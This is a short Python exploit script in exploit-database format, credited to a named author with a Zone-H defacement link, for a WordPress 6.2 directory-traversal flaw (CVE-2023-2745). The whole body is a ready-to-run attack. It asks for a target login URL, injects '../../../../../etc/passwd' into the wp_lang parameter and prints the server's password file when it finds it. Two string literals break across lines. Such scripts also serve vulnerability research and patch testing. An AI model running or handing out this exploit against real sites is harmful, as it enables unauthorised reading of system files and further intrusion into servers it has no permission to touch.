# Exploit Title: WordPress Core 6.2 - Directory Traversal
# Date: 2025-04-16
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Version: = 6.2
# Tested on: Win, Ubuntu
# CVE : CVE-2023-2745



import requests
from colorama import init, Fore, Style
init(autoreset=True)
url = input("E.G https://example.com/wp-login.php : ")
payload = '../../../../../etc/passwd'
response = requests.get(url, params={'wp_lang': payload})
if response.status_code == 200:
    if "root:x:0:0:root" in response.text:
        print(Fore.GREEN + 'Exploit successful, accessed content:')
        print(Fore.GREEN + response.text)
    else:
        print(Fore.YELLOW + 'Accessed content, but the expected file was
not found:')
        print(Fore.YELLOW + response.text)
elif response.status_code in {400, 401, 403, 404}:
    print(Fore.RED + f'Client error, status code: {response.status_code}')
elif response.status_code // 100 == 5:
    print(Fore.RED + f'Server error, status code: {response.status_code}')
elif response.status_code // 100 == 3:
    print(Fore.YELLOW + f'Redirection, status code:
{response.status_code}')
else:
    print(f'Status code: {response.status_code}')